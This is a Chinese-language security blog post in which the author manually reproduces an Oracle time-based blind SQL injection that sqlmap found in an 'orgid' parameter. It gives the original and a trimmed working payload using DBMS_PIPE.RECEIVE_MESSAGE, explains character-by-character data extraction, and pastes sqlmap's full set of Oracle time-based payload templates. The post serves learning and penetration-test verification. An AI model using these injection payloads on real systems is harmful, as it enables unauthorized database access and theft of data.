一次sqlmap扫出的Oracle数据库时间盲注的手工复现验证
sqlmap扫出的Oracle时间盲注截图
payload是
abz345Name=************&orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&abb017q=20220122&cxfw=1&abb017z=&bae204=0&pxfs=1&source=3&access_token=null&limit=12&_queryid=new
提示注入点是orgid参数,采用POST方式
由于第一次接触oracle的时间盲注,对orgid=400后面的payload不太懂,遂百度查到oracle的时间盲注主要有几种函数
DBMS_PIPE.RECEIVE_MESSAGE是其中一种(RECEIVE_MESSAGE 函数 - 从指定管道获取消息 - IBM 文档 )
手工测试时,只要页面出现指定延时,就可以判定为时间注入
后来经过反复测试,把payload缩减到了不影响判断的最少值以便于调试且发现可以使用GET方式提交,如下:
orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12
测试截图:
也请教另一位大佬得知,时间盲注也属于布尔型,就是通过真假来判断,只要出现指定时间的延时就可以判定为有注入,如果要把当前用户名或当前数据库名扒出来,只能一个个字符去尝试,每个128种尝试,sqlmap就是采用批量爆破方式,由此可以通过burpsuite去做。
SQLMap里关于Oracle数据库的时间盲注payload提取出来了(sqlmap目录\data\xml\payloads下)
<?xml version="1.0" encoding="UTF-8"?> <root> <!-- Time-based boolean tests --> <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) --> <test> <title>Oracle AND time-based blind</title> <stype>5</stype> <level>1</level> <risk>1</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <request> <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle OR time-based blind</title> <stype>5</stype> <level>1</level> <risk>3</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <request> <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle AND time-based blind (comment)</title> <stype>5</stype> <level>4</level> <risk>1</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <request> <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload> <comment>--</comment> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle OR time-based blind (comment)</title> <stype>5</stype> <level>4</level> <risk>3</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector> <request> <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload> <comment>--</comment> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle AND time-based blind (heavy query)</title> <stype>5</stype> <level>2</level> <risk>2</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <request> <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle OR time-based blind (heavy query)</title> <stype>5</stype> <level>2</level> <risk>3</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <request> <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle AND time-based blind (heavy query - comment)</title> <stype>5</stype> <level>5</level> <risk>2</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <request> <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload> <comment>--</comment> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle OR time-based blind (heavy query - comment)</title> <stype>5</stype> <level>5</level> <risk>3</risk> <clause>1,2,3,9</clause> <where>1</where> <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector> <request> <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload> <comment>--</comment> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials --> <test> <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title> <stype>5</stype> <level>3</level> <risk>1</risk> <clause>1,3,9</clause> <where>3</where> <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector> <request> <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title> <stype>5</stype> <level>3</level> <risk>1</risk> <clause>1,3,9</clause> <where>3</where> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector> <request> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle time-based blind - Parameter replace (heavy queries)</title> <stype>5</stype> <level>4</level> <risk>2</risk> <clause>1,3,9</clause> <where>3</where> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector> <request> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title> <stype>5</stype> <level>3</level> <risk>1</risk> <clause>2,3</clause> <where>1</where> <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector> <request> <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title> <stype>5</stype> <level>3</level> <risk>1</risk> <clause>2,3</clause> <where>1</where> <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector> <request> <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <test> <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title> <stype>5</stype> <level>4</level> <risk>2</risk> <clause>2,3</clause> <where>1</where> <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector> <request> <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload> </request> <response> <time>[DELAYED]</time> </response> <details> <dbms>Oracle</dbms> </details> </test> <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause --> </root>
参考:
时间型盲注_heibaikong6的博客-CSDN博客_时间盲注
从sqlmap源码看如何自定义payload - 安全客,安全资讯平台
MU5735 R.I.P
